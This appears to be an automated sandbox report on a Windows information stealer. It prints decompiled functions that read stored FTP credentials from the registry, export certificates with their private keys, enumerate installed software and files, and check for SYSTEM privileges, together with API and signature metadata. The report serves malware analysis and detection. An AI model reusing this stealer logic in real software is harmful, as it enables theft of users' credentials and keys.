                                                                        				_t31 = _a8;
                                                                        				if(_t31 == 0 ||  *_t31 == 0) {
                                                                        					L12:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					E00404F77(_a4, E00401D15(_a8, _a12)); // executed
                                                                        					E004017D5(_t33);
                                                                        					_v332 = E00401D15(_a8, "\*.*");
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t40 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t40;
                                                                        					if(_t40 + 1 == 0) {
                                                                        						goto L12;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        					do {
                                                                        						L4:
                                                                        						if((_v324.dwFileAttributes & 0x00000010) != 0) {
                                                                        							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									_v336 =  &( &_v324->cFileName);
                                                                        									E00404F77(_a4, E00401D69(E00401D69(E00401D15(_a8, "\\"), _v336), _a12));
                                                                        									E004017D5(_t53);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                        					FindClose(_v328);
                                                                        					goto L12;
                                                                        				}
                                                                        			}










                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405047
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405076
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405090
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050E8
                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*
                                                                        • API String ID: 3663067366-1173974218
                                                                        • Opcode ID: 40fde62e2cf87fb72ce1b3637c1eb9737dc98d1368d3ce461540d5087f7d7957
                                                                        • Instruction ID: b26a634762e2f79233f71d3dbaa1eefbd2c1f05767a16118d2fd1dfdcfdb69c5
                                                                        • Opcode Fuzzy Hash: 40fde62e2cf87fb72ce1b3637c1eb9737dc98d1368d3ce461540d5087f7d7957
                                                                        • Instruction Fuzzy Hash: 7731FE71800119AADF21AF61CC42BEE7779EF44308F5440B7B508B61B1D7789E909E99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E0040A4C5(intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				short _v44;
                                                                        				WCHAR* _v48;
                                                                        				char _v52;
                                                                        				char _v56;
                                                                        				short _v60;
                                                                        				char* _t34;
                                                                        				short* _t45;
                                                                        				void* _t47;
                                                                        
                                                                        				_t34 =  &_v8;
                                                                        				_push(_t34);
                                                                        				_push(0x415a7d);
                                                                        				_push(5);
                                                                        				_push(0);
                                                                        				_push(0x415a6d); // executed
                                                                        				L00410DD0(); // executed
                                                                        				if(_t34 < 0) {
                                                                        					L15:
                                                                        					return E0040A364(_t47, _a4, L"http://www.facebook.com/", 0);
                                                                        				}
                                                                        				_push( &_v12);
                                                                        				_push(_v8);
                                                                        				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
                                                                        					L14:
                                                                        					 *((intOrPtr*)( *_v8 + 8))(_v8);
                                                                        					goto L15;
                                                                        				} else {
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v52 = 0x28;
                                                                        					while(1) {
                                                                        						_v56 = 0;
                                                                        						_push( &_v56);
                                                                        						_push( &_v52);
                                                                        						_push(1);
                                                                        						_push(_v12);
                                                                        						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v48 != 0) {
                                                                        							_t45 = StrStrIW(_v48, 0x415a9d);
                                                                        							if(_t45 == 0) {
                                                                        								_v60 = 0;
                                                                        							} else {
                                                                        								 *_t45 = 0;
                                                                        								_v60 = _t45;
                                                                        							}
                                                                        							E0040A364(_t47, _a4, _v48, _v60); // executed
                                                                        							_push(_v48);
                                                                        							L00410DCA();
                                                                        							if(_v44 != 0) {
                                                                        								_push(_v44);
                                                                        								L00410DCA();
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)( *_v12 + 8))(_v12);
                                                                        					goto L14;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00415A6D,00000000,00000005,00415A7D,?), ref: 0040A4DD
                                                                        • StrStrIW.SHLWAPI(00000000,00415A9D), ref: 0040A554
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00415A9D), ref: 0040A57F
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,00415A9D), ref: 0040A58D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeTask$CreateInstance
                                                                        • String ID: ($http://www.facebook.com/
                                                                        • API String ID: 2903366249-3677894361
                                                                        • Opcode ID: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
                                                                        • Instruction ID: e0fdaf64ef7de16aafdf2735d0d685e72c2ce6657ce01d53c8c3a7317b8eeee1
                                                                        • Opcode Fuzzy Hash: 26fd28d9b999e4cc32093d22da46df2e4bc8434568c89ba86784230ad1d43a58
                                                                        • Instruction Fuzzy Hash: BF310530A00209FBDF11DFA0DC85BCEBB75BF08348F248166E500BA290D3799A95DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00402896(CHAR* _a4, intOrPtr _a8) {
                                                                        				struct _LUID _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				struct _TOKEN_PRIVILEGES _v32;
                                                                        				int _t19;
                                                                        				int _t28;
                                                                        				void* _t30;
                                                                        
                                                                        				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t30 = 0;
                                                                        					_v16 = 0;
                                                                        					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
                                                                        					if(_t19 != 0) {
                                                                        						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
                                                                        							_v32.PrivilegeCount = 1;
                                                                        							 *_t7 = _v12.LowPart;
                                                                        							_push(_v12.HighPart);
                                                                        							_pop( *_t9);
                                                                        							if(_a8 == 0) {
                                                                        								_v20 = 0;
                                                                        							} else {
                                                                        								_v20 = 2;
                                                                        							}
                                                                        						}
                                                                        						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
                                                                        						if(_t28 != 0) {
                                                                        							_t30 = _t30 + 1;
                                                                        						}
                                                                        					}
                                                                        					if(_v16 != 0) {
                                                                        						CloseHandle(_v16); // executed
                                                                        					}
                                                                        					return _t30;
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004028D1
                                                                        • GetCurrentProcess.KERNEL32 ref: 004028DB
                                                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004028E9
                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040293F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                        • String ID:
                                                                        • API String ID: 3038321057-0
                                                                        • Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
                                                                        • Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 46%
                                                                        			E0040D423(intOrPtr __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				CHAR** _v16;
                                                                        				CHAR* _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _t48;
                                                                        				int _t50;
                                                                        				int _t54;
                                                                        				CHAR** _t59;
                                                                        				CHAR** _t62;
                                                                        				CHAR** _t66;
                                                                        				CHAR** _t71;
                                                                        				intOrPtr _t79;
                                                                        				CHAR** _t81;
                                                                        				void* _t82;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x48, 0);
                                                                        				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
                                                                        					_t48 =  *0x414431(0, 0x416057); // executed
                                                                        					_v12 = _t48;
                                                                        					if(_v12 != 0) {
                                                                        						_t82 = 0;
                                                                        						while(1) {
                                                                        							_t82 =  *0x414435(_v12, _t82);
                                                                        							_t94 = _t82;
                                                                        							if(_t82 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t79 =  *((intOrPtr*)(_t82 + 0xc));
                                                                        							_v16 =  *((intOrPtr*)(_t79 + 0x68));
                                                                        							_t81 =  *(_t79 + 0x6c);
                                                                        							__eflags = _t81;
                                                                        							if(__eflags != 0) {
                                                                        								while(1) {
                                                                        									__eflags = _v16;
                                                                        									if(__eflags == 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									_t50 = lstrcmpA( *_t81, "2.5.29.37");
                                                                        									__eflags = _t50;
                                                                        									if(_t50 == 0) {
                                                                        										__eflags = _t81[2];
                                                                        										if(_t81[2] != 0) {
                                                                        											_v20 = E004017EC(_t81[2]);
                                                                        											E00401823(_t81[3], _v20, _t81[2]);
                                                                        											_t54 = lstrcmpA(_v20, 0x416064);
                                                                        											__eflags = _t54;
                                                                        											if(_t54 == 0) {
                                                                        												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
                                                                        												__eflags = _t59;
                                                                        												if(_t59 != 0) {
                                                                        													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
                                                                        													__eflags = _t62;
                                                                        													if(_t62 != 0) {
                                                                        														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
                                                                        														__eflags = _t66;
                                                                        														if(_t66 != 0) {
                                                                        															_v40 = E004017EC(_v36);
                                                                        															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
                                                                        															__eflags = _t71;
                                                                        															if(_t71 != 0) {
                                                                        																E00401486(_a4, 0xbeef0000);
                                                                        																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
                                                                        																E004014BC(_a4, _v40, _v36);
                                                                        															}
                                                                        															E004017D5(_v40);
                                                                        														}
                                                                        														 *0x414401(_v32);
                                                                        													}
                                                                        													 *0x414405(_v24, 0);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v20);
                                                                        										}
                                                                        									}
                                                                        									_t81 =  &(_t81[4]);
                                                                        									_t40 =  &_v16;
                                                                        									 *_t40 = _v16 - 1;
                                                                        									__eflags =  *_t40;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        						}
                                                                        						 *0x414439(_v12, 0);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t79, _t94, _a4, _v8);
                                                                        			}

                                                                        APIs
                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
                                                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmp$AllocCertLocalOpenStoreSystem
                                                                        • String ID: 2.5.29.37
                                                                        • API String ID: 1553736721-3842544949
                                                                        • Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
                                                                        • Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
                                                                        				long _v8;
                                                                        				void* _t8;
                                                                        				void* _t9;
                                                                        				int _t13;
                                                                        				signed int _t24;
                                                                        
                                                                        				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_push(0); // executed
                                                                        				L00410DD6(); // executed
                                                                        				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
                                                                        				_t9 = E00402B27(_t8, _t24); // executed
                                                                        				_t10 = _t9;
                                                                        				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
                                                                        					 *0x414616 = 1;
                                                                        				}
                                                                        				 *0x417695 = E004017EC(0x101);
                                                                        				_v8 = 0x101;
                                                                        				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
                                                                        				if(_t13 == 0) {
                                                                        					E004017D5( *0x417695);
                                                                        					 *0x417695 = 0; // executed
                                                                        				}
                                                                        				E00401FD8(_t24); // executed
                                                                        				return E0041038A(E00401CBA(), _t24, "Mesoamerica");
                                                                        			}

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00410B6E
                                                                        • GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeNameUser
                                                                        • String ID: H$j$Mesoamerica
                                                                        • API String ID: 2272643758-4180253440
                                                                        • Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
                                                                        • Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 48%
                                                                        			E00402896(CHAR* _a4, intOrPtr _a8) {
                                                                        				struct _LUID _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				struct _TOKEN_PRIVILEGES _v32;
                                                                        				int _t19;
                                                                        				void* _t23;
                                                                        				int _t28;
                                                                        				void* _t30;
                                                                        
                                                                        				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t30 = 0;
                                                                        					_v16 = 0;
                                                                        					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
                                                                        					if(_t19 != 0) {
                                                                        						_t23 = GetCurrentProcess();
                                                                        						_push( &_v16);
                                                                        						_push(0x20);
                                                                        						_push(_t23);
                                                                        						if( *0x41440d() != 0) {
                                                                        							_v32.PrivilegeCount = 1;
                                                                        							 *_t7 = _v12.LowPart;
                                                                        							_push(_v12.HighPart);
                                                                        							_pop( *_t9);
                                                                        							if(_a8 == 0) {
                                                                        								_v20 = 0;
                                                                        							} else {
                                                                        								_v20 = 2;
                                                                        							}
                                                                        						}
                                                                        						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
                                                                        						if(_t28 != 0) {
                                                                        							_t30 = _t30 + 1;
                                                                        						}
                                                                        					}
                                                                        					if(_v16 != 0) {
                                                                        						CloseHandle(_v16); // executed
                                                                        					}
                                                                        					return _t30;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001), ref: 004028D1
                                                                        • GetCurrentProcess.KERNEL32 ref: 004028DB
                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040293F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
                                                                        • String ID:
                                                                        • API String ID: 1569164952-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004057C2(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t29;
                                                                        
                                                                        				E00405662(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
                                                                        				E00405662(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
                                                                        				E00405662(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
                                                                        				_t29 = RegOpenKeyA( *0x4140fe, _a8,  &_v8);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004057C2(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t29;
                                                                        			}










                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405862
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00405892
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                                        • API String ID: 1332880857-44262141
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00401FD8(void* __edx) {
                                                                        				void* _v8;
                                                                        				char _v4104;
                                                                        				int _v4108;
                                                                        				int _v4112;
                                                                        				char _v4116;
                                                                        				char _v4120;
                                                                        				int _v4124;
                                                                        				void* _v4128;
                                                                        				intOrPtr _v4132;
                                                                        				long _t56;
                                                                        				void** _t60;
                                                                        				void* _t61;
                                                                        				void* _t63;
                                                                        				void* _t65;
                                                                        				void* _t71;
                                                                        				long _t76;
                                                                        				void* _t80;
                                                                        				intOrPtr _t83;
                                                                        				void* _t85;
                                                                        				void* _t86;
                                                                        				void* _t90;
                                                                        				void* _t91;
                                                                        				void* _t102;
                                                                        				void* _t112;
                                                                        				void* _t115;
                                                                        				void* _t120;
                                                                        
                                                                        				_t111 = __edx;
                                                                        				if( *0x414082 != 0) {
                                                                        					E004017D5( *0x414082);
                                                                        					 *0x414082 = 0;
                                                                        				}
                                                                        				if( *0x414086 != 0) {
                                                                        					E004017D5( *0x414086);
                                                                        					 *0x414086 = 0;
                                                                        				}
                                                                        				E00401000( &_v4116, _t111,  &_v4116); // executed
                                                                        				E00401000( &_v4120, _t111,  &_v4120);
                                                                        				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
                                                                        				if(_t56 != 0) {
                                                                        					L19:
                                                                        					E00401486(_v4116, 0);
                                                                        					E00401486(_v4120, 0);
                                                                        					_t60 =  &_v4128;
                                                                        					_push(_t60);
                                                                        					_push(_v4116);
                                                                        					L00410DBE();
                                                                        					if(_t60 >= 0) {
                                                                        						_v4124 = E0040106A(_t60, _t111, _v4116);
                                                                        						 *0x414082 = E004017EC(_v4124);
                                                                        						_t71 = GlobalLock(_v4128);
                                                                        						if(_t71 != 0) {
                                                                        							_t115 =  *0x414082; // 0x0
                                                                        							memcpy(_t115, _t71, _v4124);
                                                                        							_t120 = _t120 + 0xc;
                                                                        							GlobalUnlock(_v4128);
                                                                        						}
                                                                        					}
                                                                        					_t61 =  &_v4128;
                                                                        					_push(_t61);
                                                                        					_push(_v4120);
                                                                        					L00410DBE();
                                                                        					if(_t61 >= 0) {
                                                                        						_v4124 = E0040106A(_t61, _t111, _v4120);
                                                                        						_t65 = E004017EC(_v4124); // executed
                                                                        						 *0x414086 = _t65;
                                                                        						_t61 = GlobalLock(_v4128);
                                                                        						if(_t61 != 0) {
                                                                        							_t112 =  *0x414086; // 0x0
                                                                        							memcpy(_t112, _t61, _v4124);
                                                                        							_t61 = GlobalUnlock(_v4128);
                                                                        						}
                                                                        					}
                                                                        					_t63 = E00401019(E00401019(_t61, _t111, _v4116), _t111, _v4120); // executed
                                                                        					return _t63;
                                                                        				}
                                                                        				_v4112 = 0;
                                                                        				while(1) {
                                                                        					_v4108 = 0xfff;
                                                                        					_t76 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
                                                                        					if(_t76 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t80 = E00401D15("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
                                                                        					if(_t80 != 0) {
                                                                        						_t111 = _t80;
                                                                        						_t83 = E00401D69(_t80,  &_v4104);
                                                                        						if(_t83 != 0) {
                                                                        							_v4132 = _t83;
                                                                        							_t85 = E00401C8E(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
                                                                        							_t86 = _t85;
                                                                        							if(_t86 != 0 && _t86 > 1) {
                                                                        								_push(_t86);
                                                                        								E0040149B(_v4116, _t86, _v4124); // executed
                                                                        								_t90 = E00401C8E(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
                                                                        								_t91 = _t90;
                                                                        								if(_t91 == 0 || _v4124 <= 1) {
                                                                        									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104) + 1);
                                                                        								} else {
                                                                        									_push(_t91);
                                                                        									E0040149B(_v4120,  &_v4104, lstrlenA( &_v4104));
                                                                        									_t102 = _t91;
                                                                        									E0040149B(_v4120, _t102, _v4124);
                                                                        									E004017D5();
                                                                        								}
                                                                        								E004017D5();
                                                                        							}
                                                                        							E004017D5(_v4132);
                                                                        						}
                                                                        					}
                                                                        					_v4112 = _v4112 + 1;
                                                                        				}
                                                                        				RegCloseKey(_v8);
                                                                        				goto L19;
                                                                        			}






























                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00410BE4), ref: 00402045
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00402085
                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 00402138
                                                                        • lstrlenA.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 00402171
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • RegCloseKey.ADVAPI32(00410BE4,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A8
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 004021D4
                                                                        • GlobalLock.KERNEL32 ref: 00402204
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402223
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402235
                                                                        • GlobalLock.KERNEL32 ref: 00402265
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00402284
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 4234118056-981893429
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00402B27(void* __eax, void* __edx) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				CHAR* _v20;
                                                                        				int _t26;
                                                                        				int _t32;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        
                                                                        				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
                                                                        					_t42 = 0;
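                                                                         					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) { // 8 = TOKEN_QUERY
                                                                         						_v12 = 0;
                                                                         						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed; class 1 = TokenUser, this first call only obtains the required buffer size
                                                                         						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) { // 0x7a = ERROR_INSUFFICIENT_BUFFER
                                                                         							_v16 = E004017EC(_v12);
                                                                         							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
                                                                         							if(_t32 != 0) {
                                                                         								_push( &_v20);
                                                                         								_push( *_v16);
                                                                         								if( *0x414419() != 0) { // pointer resolved at run time; the API list for this function shows ConvertSidToStringSidA at this call site
                                                                         									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed; S-1-5-18 is the LocalSystem SID
                                                                         									if(_t39 == 0) {
                                                                         										_t42 = 1; // the process token's user is SYSTEM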
                                                                        									}
                                                                        									LocalFree(_v20);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v16);
                                                                        						}
                                                                        						CloseHandle(_v8);
                                                                        					}
                                                                        					return _t42;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 00402B56
                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00410B87), ref: 00402B62
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00402B84
                                                                        • GetLastError.KERNEL32 ref: 00402B8E
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 00402BB8
                                                                        • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00402BCC
                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
                                                                        • CloseHandle.KERNEL32(00410B87), ref: 00402BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
